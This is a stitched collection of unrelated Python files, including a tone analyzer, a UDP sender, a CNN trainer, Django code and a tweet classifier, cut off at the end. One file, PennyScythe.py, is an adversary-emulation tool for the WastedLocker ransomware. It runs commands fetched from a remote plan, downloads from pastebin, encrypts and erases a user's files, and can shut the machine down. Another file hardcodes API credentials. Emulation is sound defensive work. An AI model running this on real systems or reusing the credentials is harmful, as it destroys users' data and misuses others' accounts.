fetch_and_open_in_browsah(self):\n file_name = self.gen_and_fetch()\n if file_name is None:\n self.output_box.append('url cannot be blank!')\n return None\n else:\n webbrowser.open(file_name)\n\n \n\nif __name__ == '__main__':\n app = QApplication([])\n # appctxt = ApplicationContext() # 1. Instantiate ApplicationContext\n # window = QMainWindow()\n # window.resize(250, 150)\n # window.show()\n rtb = mainWindow()\n rtb.show()\n # exit_code = appctxt.app.exec_() # 2. Invoke appctxt.app.exec_()\n # sys.exit(exit_code)\n sys.exit(app.exec_())","sub_path":"read_the_bee.py","file_name":"read_the_bee.py","file_ext":"py","file_size_in_byte":8558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"124262395","text":"import json\nfrom watson_developer_cloud import ToneAnalyzerV3\nimport textrazor\n\ndef analyzeText(text):\n textrazor.api_key = \"b695217cdaeb234d8a4edd867e1ab59b23aa1d050fa063c5f4a3a89a\"\n client = textrazor.TextRazor(extractors=[\"topics\"])\n response = client.analyze(text)\n topic = map(lambda x: str(x.label), response.topics()[:8])\n ans = \"\"\n for topica in topic:\n ans += topica + \"
    \"\n return ans\n\n\ncolors = {'Anger':'#FFE0E6', 'Confident':'#F1DED3', 'Analytical':'#EBE1FE', 'Fear':'#DCF2F2', 'Tentative':'#FFEEFE', 'Sadness':'#D8ECFA', 'Joy':'#FFF5DF'}\n\ndef colorText(text):\n tone_analyzer = ToneAnalyzerV3(\n version ='2017-09-21',\n username ='f163ce1a-be0a-4dd8-93f8-17b1b02cc209',\n password ='OUcpFH7JH8rT'\n )\n content_type = 'application/json'\n\n tone = tone_analyzer.tone({\"text\": text},content_type)\n ans = \"\"\n try:\n for sentence in tone['sentences_tone']:\n if len(sentence['tones']) > 0:\n ans += colorSentence(sentence['text'], sentence['tones'][0]['tone_name'])\n else:\n ans += sentence['text']\n ans+= ' '\n except:\n ans = text\n return ans\n\nsents = [\"Anger\", \"Sadness\", \"Joy\", \"Fear\", \"Analytical\", \"Confident\", \"Tentative\"]\ndef sentList(text):\n tone_analyzer = ToneAnalyzerV3(\n version ='2017-09-21',\n username ='f163ce1a-be0a-4dd8-93f8-17b1b02cc209',\n password ='OUcpFH7JH8rT'\n )\n content_type = 'application/json'\n\n tone = tone_analyzer.tone({\"text\": text},content_type)\n sentiments = [0,0,0,0,0,0,0]\n try:\n for sentiment in range(len(sents)):\n for senti in tone['document_tone']['tones']:\n if senti['tone_name'] == sents[sentiment]:\n sentiments[sentiment] = senti['score']\n except:\n sentiments = [0,0,0,0,0,0,0]\n return sentiments\n\ndef colorSentence(sentence, emotion):\n\treturn('' + sentence + \"\")\n","sub_path":"app/sent.py","file_name":"sent.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"410810183","text":"#!/usr/bin/env python3\n#\n# PennyScythe.py is a Python3 script that ingests and runs adversarial emulation\n# plans from SCYTHE's Community Threats Repository \n# [https://github.com/scythe-io/community-threats]\n# \n# The script has only been tested with the EvilCorp WastedLocker threat plan, \n# and would likely require enhancements to work with other plans\n#\n# Usage: python[.exe] PennyScythe.py\n\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n#\n# DISCLAIMER: I don't work for Scythe and this project is in no way associated \n# with or endorsed by scythe.io. Use at your own risk!\n#\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n#\n# Author: Mike Gualtieri\n# Blog: https://www.mike-gualtieri.com\n# Twitter: https://twitter.com/mlgualtieri\n# GitHub: https://github.com/mlgualtieri/PennyScythe\n#\n\nimport os, time, sys, urllib.request, json, shutil\n\n# Emulate EvilCorp WastedLocker\nEMULATION_PLAN_URL = \"https://raw.githubusercontent.com/scythe-io/community-threats/master/EvilCorp/WastedLocker_scythe_threat.json\"\n\n# Default time to sleep between steps in plan\nDEFAULT_SLEEP = 5\n\n# Likely only useful to your author \nDEBUG = False\n\n\ndef doRun(request):\n print(\" > Running:\", request)\n time.sleep(DEFAULT_SLEEP)\n ### Debug\n if DEBUG == True:\n request = \"ls /tmp\"\n os.system(request)\n\n\n\ndef doFile(request):\n print(\" > File:\", request)\n time.sleep(DEFAULT_SLEEP)\n\n req = request.split(\" \")\n\n if \"--create\" in req:\n path = req[ req.index(\"--path\") + 1].strip('\\\"')\n size = req[ req.index(\"--size\") + 1]\n count = int(req[ req.index(\"--count\") + 1])\n\n path = path.replace(\"%USERPROFILE%\", os.environ[\"USERPROFILE\"])\n\n ### Debug\n if DEBUG == True:\n path = \"/tmp/scythe/important_files.wasted\"\n\n # Convert size to bytes\n if size.endswith(\"MB\"):\n size = int(size[:-2]) * 1024 * 1024\n\n # Creating file(s)\n for i in range(count):\n f = open(path + str(i+1), \"wb\")\n f.seek(size - 1)\n f.write(b\"\\0\")\n f.close()\n # Insert a short delay between each file creation\n time.sleep(0.01)\n\n\n\n# A standard Python XOR implementation\ndef doXOR(data, key): \n return bytearray(a^b for a, b in zip(*map(bytearray, [data, key]))) \n\n\n\n# We'll use XOR encryption since it's simple to implement\ndef doCrypt(request):\n print(\" > Crypt:\", request)\n time.sleep(DEFAULT_SLEEP)\n\n req = request.split(\" \")\n\n target = req[ req.index(\"--target\") + 1].strip('\\\"')\n password = req[ req.index(\"--password\") + 1].strip('\\\"')\n\n target = target.replace(\"%USERPROFILE%\", os.environ[\"USERPROFILE\"])\n\n if DEBUG == True:\n target = \"/tmp/scythe\"\n\n doErase = False\n doRecurse = False\n\n if \"--erase\" in req:\n doErase = True\n\n # Ignore recurse for now\n if \"--recurse\" in req:\n doRecurse = True\n\n allfiles = os.listdir(target)\n\n for filename in allfiles:\n outfile = filename + \".xor\"\n outfile = os.path.join(target, outfile)\n filename = os.path.join(target, filename)\n\n with open(filename, mode='rb') as file:\n data = file.read()\n enc = doXOR(data, password.encode())\n out = open(outfile, 'wb+')\n out.write(enc)\n out.close()\n\n if doErase == True:\n os.remove(filename)\n\n\n\ndef doDownloader(request):\n print(\" > Download :\", request)\n time.sleep(DEFAULT_SLEEP)\n\n req = request.split(\" \")\n src = req[ req.index(\"--src\") + 1].strip('\\\"')\n dest = req[ req.index(\"--dest\") + 1].strip('\\\"')\n\n dest = dest.replace(\"%USERPROFILE%\", os.environ[\"USERPROFILE\"])\n \n # Make sure we pull the \"raw\" file\n src = src.replace(\"pastebin.com/\",\"pastebin.com/raw/\")\n\n ### Debug\n if DEBUG == True:\n dest = \"/tmp/scythe/wasted_info.txt\"\n\n print(\" Source :\", src)\n print(\" Dest :\", dest)\n\n r = urllib.request.Request(src)\n rs = urllib.request.urlopen(r)\n data = rs.read()\n\n out = open(dest, 'wb')\n out.write(data)\n out.close()\n\n\n\n\ndef doController(request):\n print(\" > Controller :\", request)\n time.sleep(DEFAULT_SLEEP)\n\n if request == \"--shutdown\":\n print(\"\\n\\nController is requesting to initiate a shutdown. Proceed? [y/N] \", end=\"\")\n theInput = input().lower()\n \n if theInput == \"y\":\n print(\"Shutting down...\")\n time.sleep(DEFAULT_SLEEP)\n os.system(\"shutdown /s /t 0\")\n else:\n print(\"Skipping shutdown...\")\n\n\n\n\ndef startEmulation(emulation_plan_url):\n with urllib.request.urlopen(emulation_plan_url) as url:\n emulation_plan = json.loads(url.read().decode())\n \n \n print(\"Threat :\", emulation_plan[\"threat\"][\"display_name\"])\n print(\"Description :\", emulation_plan[\"threat\"][\"description\"])\n print(\"Platform :\", emulation_plan[\"threat\"][\"operating_system_name\"].capitalize())\n \n print('')\n print(\"\\nReady to start? [Y/n] \", end=\"\")\n doStart = input().lower()\n \n if doStart == \"n\":\n exit()\n \n \n print(\"\\nStarting emulation...\")\n \n for i in emulation_plan[\"threat\"][\"script\"]:\n step = emulation_plan[\"threat\"][\"script\"][i]\n \n if \"type\" in step:\n if step[\"type\"] == \"message\":\n \n # Skip over initialization and loader steps\n valid_modules = [\"run\",\"file\",\"crypt\",\"downloader\",\"controller\"]\n \n if step[\"module\"] in valid_modules:\n \n if \"rtags\" in step:\n for tag in step[\"rtags\"]:\n _tag = tag.split(\":\")\n if(_tag[0] == \"att&ck-technique\"):\n print(\"\\n Emulating ATT&CK Technique : \", _tag[1], \" [https://attack.mitre.org/techniques/\", _tag[1] ,\"]\", sep = \"\")\n \n if \"module\" in step:\n if step[\"module\"] == \"run\":\n doRun(step[\"request\"])\n elif step[\"module\"] == \"file\":\n doFile(step[\"request\"])\n elif step[\"module\"] == \"crypt\":\n doCrypt(step[\"request\"])\n elif step[\"module\"] == \"downloader\":\n doDownloader(step[\"request\"])\n elif step[\"module\"] == \"controller\":\n doController(step[\"request\"])\n \n print(\"Done!\")\n\n\n\n\ndef banner():\n print('')\n print(' `-://+sssyyyysso/:-.` ')\n print(' `-/shmNmmdhhyoooooo+osyhdmNmhs+:. ')\n print(' `:ohmmmhso:` `:/+ymMds:` ')\n print(' :ymNdo/. `.--:::::--..` ./shmy/` ')\n print(' -ommmo. ./oydNNMMMMMMMNMMMNNNmdhso/./:-.:smy/ ')\n print(' :ymd+.` ./ymNMNmmdhhhyyhhhdmNMMMMMMMMMN+Nym `/hdo` ')\n print(' -ydh/` `/shyo/-.``` ````.:+shmMMsdmNo `+ho` ')\n print(' `omd: ..` ``::myN` `/y+` ')\n print(' :hm+` ` :mh. `:s- ')\n print(' ohh. -/+shh //////////- dMs `o/ ')\n print(' `sNs`.shmddhd- .MMMMMMMMMMo :MN. /+ ')\n print(' `+h+ -sshddhhy: ./mMMMMMMMMMMo hMs -+ ')\n print(' /s: -o+yddhhs: yhdNMMMMMMMMMMMMo -MN. -+ ')\n print(' :s/ .o:-oyhhy` `MMMMMMMMMMMMMMMMo hMy .yo:` -- ')\n print(' `/y +:+syyhy. `MMMMMMMMMMMMMMMMo -MM. `ssyyyo: :` ')\n print(' :y. :o-+-+sh: `MMMMMMMMMMMMMMMMo yMy :yyys/yh` - ')\n print(' -h s//:-:+o `MMMMMMMMMMMMMMMMo .MM- sssosyyo + ')\n print(' +/ -+:+:-:o. ::::yMMMMMMMMMMMo yMh :sssoyyy` --')\n print(' h` :o-/-//o +MMMMMMMMMMMo .MM- syysyyy- .')\n print(' d +o--:/:: +MMMMMMMMMMMo sMh +oyssyy/ `')\n print('`m +o./:++/ +MMMMMMMMMMMo .NM- :oy:oyy+ `')\n print('`m +y.:./+/ +MMMMMMMMMMMo sMh +o:--sm+ .')\n print(' d` :s:/-:o+ +MMMMMMMMMMMo`NM: o+:-/sm: -')\n print(' y/ `yo:/:o/- +MMMMMMMMMMMooMd -so/+oyh` `')\n print(' /y ss/s:o++ oMMMMMMMMMMMyNM: o+o/yoyo ` ')\n print(' /d/ -s:o:-oo- ```-mMMMMMMMMMMMNMm`` :s/o/oom. . ')\n print(' -hm. +syo++s:. ommNMMMMMMMMMMMMMMNmo :o+/ohoy+ `` ')\n print(' `odh` syy:/oyo sMMMMMMMMMMMMMMMMMMMy :y/osooyo . ')\n print(' -ydy` +ysh/s+/ sMMMMMMMMMMMMMMMMMMMy `/+/o+hoss` - ')\n print(' :oms -sho+os sMMMMMMMMMMMMMMMMMMMy -s+++ysoss` :` ')\n print(' :ymy` -+so+: sMMMMMMMMMMMMMMMMMMMy .ososs+ysh+ `-` ')\n print(' :dNh- `:+h+` /yyyyyyyyyyyyyyyyyyy+ `:so+y+sysy- .:` ')\n print(' .ydmo` `/y+. .sysysdhhs:` `+- ')\n print(' /hmh/` :ss:` `oysymdhs/ `/o` ')\n print(' `ommd+- `/yy+. `./sddhhy+:` -/o. ')\n print(' `odmNs-` `:+ ``-:syhy+:.` `-oy: ')\n print(' `+dNNNs:` .syyyo/-` `./yds. ')\n print(' -ohMNNyo:` `.:ohNmy:` ')\n print(' .+yNMMMmhhso//:-..` `-+oydNMNmy+. ')\n print(' -/sdNMMMMMMMMMNmmmdddmmNNMMMMMmy+:` ')\n print(' .:/osyddmNNNNNNmmdhys+:.` ')\n print('')\n print(' -= PennyScythe =-')\n print(' -= Adversarial Emulation on the Cheap =-')\n print('')\n print('Note: This project is in no way associated with or endorsed by scythe.io!')\n\n\n\n\ndef main(argv):\n try:\n banner()\n print('')\n startEmulation(EMULATION_PLAN_URL)\n except KeyboardInterrupt:\n # Gracefully exit on ctrl-c\n print(\"\\nBye!\")\n pass\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n\n\n","sub_path":"PennyScythe.py","file_name":"PennyScythe.py","file_ext":"py","file_size_in_byte":11095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"611540009","text":"# SENDER.PY\r\n# LAURIE DELINOIS, MARCUS WONG\r\n# ----- sender.py ------\r\n\r\n#!/usr/bin/env python\r\nfrom socket import *\r\nimport sys\r\nimport time\r\nimport json\r\nimport base64\r\n\r\n\r\n \r\nhost =sys.argv[1]\r\nport = int(sys.argv[2])\r\n\r\ns = socket(AF_INET,SOCK_DGRAM)\r\n#s.setblocking(0)\r\nbuf =1024\r\naddr = (host,port)\r\n\r\n\r\n\r\n#possibly needs to take this in as a string for packet and not be encoded already?\r\n#no, simply send buffer size to packet instead of having it read in directly\r\n\r\n\r\n#write data in from command line\r\ndata = sys.stdin.read().encode()\r\n\r\n\"\"\"\r\nstart_time = time.time()\r\ntotal_kb = 0\r\n\"\"\"\r\n#-----------------------------make packets-----------------------------------\r\ndef create_packet(data, buf):\r\n \r\n #make the data into a list of bytes to iterate through\r\n seqnum = 0\r\n \r\n new_seqnum = str(seqnum)\r\n\r\n b_arr = bytearray(data)\r\n s_arr = bytearray(seqnum)\r\n \r\n #send bytearray with sequence number\r\n #b_arr.append(seqnum)\r\n \r\n #add seqnum array and data bytearray\r\n b_arr += s_arr\r\n \r\n \r\n \r\n #pass data into packet object\r\n packet = [b_arr[i:i + buf] for i in range(0, len(b_arr), buf)]\r\n #https://stackoverflow.com/questions/312443/how-do-you-split-a-list-into-evenly-sized-chunks/312464#312464\r\n #packets = packet + header\r\n \r\n return packet\r\n\r\n\r\nstart_time = time.time()\r\ntotal_kb = 0\r\nseqnum = 0\r\npackets = create_packet(data, buf)\r\n\r\narr_index = 0\r\nack = \" \"\r\ns.settimeout(0.5)\r\n\r\nwhile (arr_index < len(packets)): \r\n \"\"\" idea: have packets and sequence numbers in the same dictionary \"\"\"\r\n \r\n \r\n #packets are written into dictionary with sequence number attached to array index\r\n #pack = {\"packets\" : packets[arr_index], \"seqnum\" : seqnum}\r\n \r\n if(s.sendto(packets[arr_index], addr)):\r\n arr_index = arr_index + 1\r\n seqnum = arr_index\r\n \r\n \r\n \r\n #keep track of time and total kb\r\n current_time = time.time()\r\n elapsed_time = current_time - start_time\r\n total_kb = total_kb + 1\r\n \r\n #print(\"Sequence Number: \" + str(pack.get('seqnum')))\r\n print(\"Sequence Number: \" + str(seqnum))\r\n \r\n #--------------------------------------------------------------for receiving acknowledgements----------------------------------------------------------- \r\n \r\n #set false flag\r\n ack_flag = False\r\n \r\n #waiting to receive ack from receiver\r\n \r\n while not ack_flag:\r\n try:\r\n ack, addr = s.recvfrom(1024)\r\n \r\n ack_flag = True \r\n \r\n #print(\"Ack Received\")\r\n except timeout:\r\n s.sendto(packets[arr_index], addr)\r\n #s.sendto(pack.get('packets'), addr)\r\n s.settimeout(2)\r\n print (ack)\r\n \r\n #----------------------------------------------------------for receiving acks------------------------------------------------------------------\r\n \r\n \r\n#close socket once all data sent and all acks received \r\ns.close()\r\n\r\nsys.stderr.write(\"All acks received.\\n\")\r\n\r\nelapsed_time = float(\"%0.3f\" % (elapsed_time))\r\nbytes = total_kb * 1024\r\nkb_sec = total_kb/elapsed_time\r\nkb_sec = float(\"%0.3f\" % (kb_sec))\r\nprint(\"Sent \" + str(bytes) + \" bytes in \" + str(elapsed_time) + \" seconds: \" + str(kb_sec) + \" kB/s\")\r\nprint(\"Packets sent: \" + str(arr_index))","sub_path":"project2/src/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"292640158","text":"import pickle\r\nimport tensorflow as tf\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Dense , Flatten\r\nimport numpy as np\r\n\r\n\r\nx = pickle.load(open(\"x.pickle\",\"rb\")) #shape of x is (number of images , 80 , 80 ,1 ) 80x80 is height and width and 1 is the channel i.e. grayscale here\r\nx = x / 255.0\r\n\r\ny = np.asarray(pickle.load(open(\"y.pickle\",\"rb\")))\r\nprint(x.shape)\r\n\r\nmodel = Sequential()\r\nmodel.add( Conv2D(64 ,input_shape=x.shape[1:], kernel_size= (3,3) , padding='same' , strides = (1,1) , activation='relu'))\r\nmodel.add( MaxPooling2D(pool_size=(2,2) , padding='valid' , strides = 1) )\r\n\r\nmodel.add( Conv2D(64 , kernel_size= (3,3) , padding='same' , strides = (1,1) , activation='relu') )\r\nmodel.add( MaxPooling2D(pool_size=(2,2) , padding='valid' , strides = 1) )\r\n\r\nmodel.add(Flatten())\r\nmodel.add(Dense(1 , activation='sigmoid'))\r\n\r\nmodel.compile(loss = 'binary_crossentropy' , optimizer='adam' , metrics=['accuracy'])\r\n\r\nmodel.fit(x,y,batch_size=32,validation_split=0.1,epochs = 5)\r\n\r\nmodel.save(\"cat-v-dog.model\")","sub_path":"cat_dog_model_prep.py","file_name":"cat_dog_model_prep.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"42285395","text":"from oscar.apps.offer.abstract_models import AbstractConditionalOffer\nfrom oscar.core.loading import get_model\n\nclass ConditionalOffer(AbstractConditionalOffer):\n def products(self):\n \"\"\"\n Return a queryset of products in this offer\n \"\"\"\n Product = get_model('catalogue', 'Product')\n if not self.has_products:\n return Product.objects.none()\n\n cond_range = self.condition.range\n if cond_range.includes_all_products:\n # Return ALL the products\n queryset = Product.browsable\n else:\n #queryset = cond_range.included_products\n queryset=cond_range.all_products() #by ternovo\n \n return queryset.filter(is_discountable=True).exclude(\n structure=Product.CHILD)\n\n\n\nfrom oscar.apps.offer.models import * # noqa","sub_path":"apps/offer/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"484460432","text":"\nimport pandas as pd\nmapping_df = pd.read_csv('../../examples/classification/mapping.csv')\n\n\ndef get_label(template_id):\n row = mapping_df[mapping_df[\"template_id\"] == template_id] \n label = row[\"label\"].values[0]\n print(\"get_label \", label)\n return label\n\ndef check_if_exists(template_id):\n template_ids = mapping_df[\"template_id\"].values\n exists = template_id in template_ids\n print(\"check_if_exists \", exists)\n return exists\n\ndef add_template_id(template_id):\n print(mapping_df)\n max_label = mapping_df['label'].max()\n new_label = int(max_label) +1\n new_row = [new_label ,template_id]\n mapping_df.loc[len(mapping_df)] = new_row\n mapping_df.to_csv('mapping.csv', header=True, mode = 'w', index=False)\n return new_label\n\ndef max_label():\n return mapping_df['label'].max()\n\n\nif __name__ == \"__main__\":\n add_template_id('temp_2')","sub_path":"layoutlm/layoutlm/data/mapping.py","file_name":"mapping.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"583777971","text":"from talon.voice import Context, Key\n\nctx = Context(\"navigation\")\n\nkeymap = {\n # Requires activation of System Preferences -> Shortcuts -> Input Sources\n # -> \"Select the previous input source\"\n \"change language\": Key(\"ctrl-space\"),\n # moving\n \"tarsh\": Key(\"shift-tab\"),\n # scrolling\n \"scroll down\": [Key(\"down\")] * 30,\n \"scroll up\": [Key(\"up\")] * 30,\n # NB home and end do not work in all apps\n \"(scroll way down | doomway)\": Key(\"cmd-down\"),\n \"(scroll way up | jeepway)\": Key(\"cmd-up\"),\n # from std.py\n \"new window\": Key(\"cmd-n\"),\n \"next window\": Key(\"cmd-`\"),\n \"last window\": Key(\"cmd-shift-`\"),\n \"next app\": Key(\"cmd-tab\"),\n \"last app\": Key(\"cmd-shift-tab\"),\n \"next tab\": Key(\"cmd-shift-]\"),\n \"new tab\": Key(\"cmd-t\"),\n \"(last | prevous | preev) tab\": Key(\"cmd-shift-[\"),\n \"next space\": Key(\"cmd-alt-ctrl-right\"),\n \"last space\": Key(\"cmd-alt-ctrl-left\"),\n \"(marco | search)\": Key(\"cmd-f\"),\n}\n\nctx.keymap(keymap)\n\n","sub_path":"misc/navigation.py","file_name":"navigation.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"579377704","text":"import string\nfilepath = r'c:\\users\\ysc\\desktop\\sample.txt'\nwith open(filepath, 'r') as f:\n words = {}\n strip = string.whitespace + string.punctuation + string.digits\n print(strip)\n for line in f.readlines():\n for word in line.lower().split():\n word = word.strip(strip)\n if len(word) > 2:\n words[word] = words.get(word, 0) +1\n for word in sorted(words):\n if words[word] > 50:\n print('{0} occurs {1} times'.format(word, words[word]))\n","sub_path":"my_wordcounter.py","file_name":"my_wordcounter.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"290780721","text":"#Cargar librerías\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport sklearn\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras import layers\nimport json\n\n#hiperparametros\nmuestra_de_labels = False\nmodelo_usado = \"LSTM\"\nnumero_de_labels = 3 # establecer cuantos labels se usan para testear modelo, todos serian 1026\nembedding_dim = 300 # La dimensión de los embeddings es un parámetro que, a medida que cambia, genera diferentes resultados.\noptimizador = \"RMSprop\" # Adam y Nadam son alternativas comunes.\nloss = \"sparse_categorical_crossentropy\"\nepochs = 10 # este parámetro determina la cantidad de veces que el modelo ve la base de entrenamiento. Normalmente de tres a cinco veces es suficiente en los modelos de NLP, muchos entrenamientos generan sobreajuste.\nbatch_size = 800 # El tamaño del lote determina la cantidad de datos procesados al mismo tiempo, una gran cantidad genera que la computadora no sea capaz de procesarlo, muy pocos provocan que el entrenamiento del modelo sea muy lento, por lo que lo ideal es que este número sea el mayor posible sin que la computadora se bloquee.\n\nbase_clasificada = pd.read_csv(\"datos_clasificacion.csv\", sep=\";\", encoding=\"utf-8\")\nfrom sklearn.utils import shuffle\nbase_clasificada = shuffle(base_clasificada)\nprint(base_clasificada)\n\nbase_clasificada[\"trata la sequia\"] = base_clasificada[\"trata la sequia\"].replace({'s': \"1\", 'n': \"0\"})\nprint(base_clasificada[\"trata la sequia\"])\n\nsentences = base_clasificada['ruta'].values\ny = base_clasificada['trata la sequia'].values\n\nfrom nltk.corpus import stopwords\nfrom collections import Counter\nimport re\n# text = \"le dije hola a los perros corren por la pradera\"\nstop_words = stopwords.words('spanish')\n# stop_words.extend([\"hola\",\"chao\"])\n# print(stop_words)\nstopwords_dict = Counter(stop_words)\n\nruta_tweets = \"/Users/joaqu/OneDrive/Documentos/drive/twitter/tweets final/\"\nfor idx, val in enumerate(sentences):\n tweet = open(ruta_tweets + val.replace(\"filename \", \"\") , encoding=\"utf-8\")\n tweet_dict = json.load(tweet)\n texto_location_tweet = tweet_dict[\"full_text\"]\n sentences[idx] = texto_location_tweet\n sentences[idx] = re.sub(\"@[a-zA-Z0-9áéíóúñ_-]*\", \"hastag\", sentences[idx])\n sentences[idx] = re.sub(\"#[a-zA-Z0-9áéíóúñ_-]*\", \"user\", sentences[idx])\n sentences[idx] = re.sub(\"https:\\/\\/[a-zA-Z0-9áéíóúñ.\\/]*\", \"link\", sentences[idx])\n sentences[idx] = ' '.join([word for word in sentences[idx].split() if word not in stopwords_dict])\n# print(text)\nprint(sentences)\n\ndf = pd.DataFrame(list(zip(sentences, y)), \n columns =['sentences', 'y'])\ndf = df.drop_duplicates(subset='sentences', keep=\"first\")\n \n\nsentences = df['sentences'].values\ny = df['y'].values\n\nsentences_train, sentences_test, y_train, y_test = train_test_split(sentences, y, test_size=0.1, random_state = 1000, stratify = y)\n\nprint(sentences_train)\nprint(sentences_test)\nprint(y_train)\nprint(y_test)\n\ny_train = y_train.astype(np.float)\ny_test = y_test.astype(np.float)\n\n\n# Tokenizar texto\ntokenizer = Tokenizer(num_words=1000, oov_token = \"OOV\") # Aquí pones el número de tokens junto al token que recibe las palabras fuera del vocabulario. Una cantidad demasiado grande de tokens puede hacer que se manejen mal palabras poco comunes.\ntokenizer.fit_on_texts(sentences_train)\n\nX_train = tokenizer.texts_to_sequences(sentences_train)\nX_test = tokenizer.texts_to_sequences(sentences_test)\n\nvocab_size = len(tokenizer.word_index) + 1\n\nprint(sentences_train[1])\nprint(X_train[1])\n\n# Generar el padding. Se pone al principio las palabras y luego se completa con ceros\nmaxlen = 50\nX_train = pad_sequences(X_train, padding='post', maxlen=maxlen)\nX_test = pad_sequences(X_test, padding='post', maxlen=maxlen)\nprint(X_train[2, :])\n\n\n# Definir arquitectura de la red y compilar el modelo\n\nmodel = Sequential()\nmodel.add(layers.Embedding(input_dim=vocab_size, \n output_dim=embedding_dim, \n input_length=maxlen))\nmodel.add(layers.Bidirectional(layers.LSTM(embedding_dim)))\nmodel.add(layers.Dense(embedding_dim, activation='relu'))\nmodel.add(layers.Dense(numero_de_labels, activation='softmax'))\n\n\nmodel.compile(optimizer=optimizador,\n loss=loss,\n metrics=['accuracy'])\nmodel.summary()\n\n\n# Entrenar el modelo \nhistory = model.fit(X_train, y_train,\n epochs = epochs,\n verbose=False,\n validation_split = 0.1,\n #validation_data=(X_test, y_test),\n batch_size = batch_size)\n \n \n# Train accuracy\nloss, accuracy = model.evaluate(X_train, y_train, verbose=False)\nprint(\"Training Accuracy: {:.4f}\".format(accuracy))\n \nprint(history.history['val_accuracy'])\nprint(history.history['accuracy'])\n\n\n# Testear en datos que la red aún no ha visto\nprint(\"test accuracy\")\npredict = model.predict_classes(X_test, verbose=0)\n\n# Ordenar tabla de salida con las predicciones\npred_df = pd.DataFrame(predict, columns=['predicho']) \ny_test_df = pd.DataFrame(y_test, columns=['real']) \n#glosas = pd.DataFrame(sentences_test, columns=['glosa_original'])\npred_df2 = pd.concat([pred_df, y_test_df], axis=1, sort=False)\n\n# Mirar porcentaje de coincidencia\ncomparar = np.where(pred_df2[\"real\"] == pred_df2[\"predicho\"], True, False)\nprint(\"performance test data set\")\nprint(comparar.mean())\n\n\n \n# train and validation loss\nimport matplotlib.pyplot as plt\nplt.style.use('ggplot')\n\nnumero_de_embeddings = str(embedding_dim)\nnumero_de_labels_string = str(numero_de_labels)\nperformance_test = str(comparar.mean())\nnombre_prueba = \"clasificador de ubicacion, Modelo \" + modelo_usado + \", performance test dataset \" + performance_test + \", optimizador \" + optimizador + \", labels \" + numero_de_labels_string # Aquí se nombra el JSON que entrega los resultados del modelo.\n\nx = sklearn.metrics.classification_report(y_test, predict, output_dict=True)\n\nimport json\n\nj = open(\"loss_models/\" + nombre_prueba + \".txt\", \"w\", encoding=\"utf-8\")\nj.write(json.dumps(x, ensure_ascii=False))\nj.close()\n\n\nmodel.save(\"models/lstm trata sequia o no, performance modelo \" + performance_test + \".h5\") # creates a HDF5 file 'my_model.h5'\ndel model # deletes the existing model\n\nimport pickle\n\n# saving\nwith open(\"tokenizer/token trata sequia o no, performance model\"+ performance_test +\".pickle\", 'wb') as handle:\n pickle.dump(tokenizer, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n\nfrom tensorflow.keras.models import load_model\n# import pickle\nmodel = load_model(\"models/lstm trata sequia o no, performance modelo \" + performance_test + \".h5\")\n\nprint(type(model))\n\n\n# loading\nwith open(\"tokenizer/token trata sequia o no, performance model\"+ performance_test +\".pickle\", 'rb') as handle:\n tokenizer = pickle.load(handle)\n\n\n# import numpy as np\nejemplo_de_frase = tokenizer.texts_to_sequences([\"hay muacha sequia en el mexico actual\"])\n\nprint(ejemplo_de_frase)\n\n# Generate predictions for samples\npredictions = model.predict(ejemplo_de_frase)\nprint(predictions)\n\n# Generate arg maxes for predictions\nclasses = np.argmax(predictions, axis = 1)\nprint(classes)","sub_path":"clasificador trata sequia o no.py","file_name":"clasificador trata sequia o no.py","file_ext":"py","file_size_in_byte":7369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"607061100","text":"from rest_framework import serializers\nfrom myplatform.settings import URL_FRONT\nfrom sendmail.sendmail import SendMail\nfrom sms.models import InfoSms\nfrom backend.slack import slack_notify\nfrom .models import HrProfile, HrProfileCoWorker, HrSpecial, HrImage, HrFile, HrAccountInfo, HrFee\nfrom backend.models import (\n ComIdx, ComCode, User, Alarm\n)\nfrom backend.serializers import ComCodeSerializer, UserSimpleSerializer\nfrom company_profile.serializers import SugubReviewSerializer, SugubSerializer\n\nclass HrAccountInfoSerializer(serializers.ModelSerializer):\n class Meta:\n model = HrAccountInfo\n fields = ['id', 'hrprofile', 'account_name', 'account_phone', 'account_email']\n read_only_fields = ['hrprofile']\n\n\nclass HrProfileCoworkerSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n user = serializers.CharField()\n hrprofile_auth = serializers.CharField()\n # hrprofile_auth = serializers.Serializer('backend.ComCodeSerializer')\n hrprofile_auth = ComCodeSerializer()\n coworker_phone = serializers.CharField()\n\n\nclass 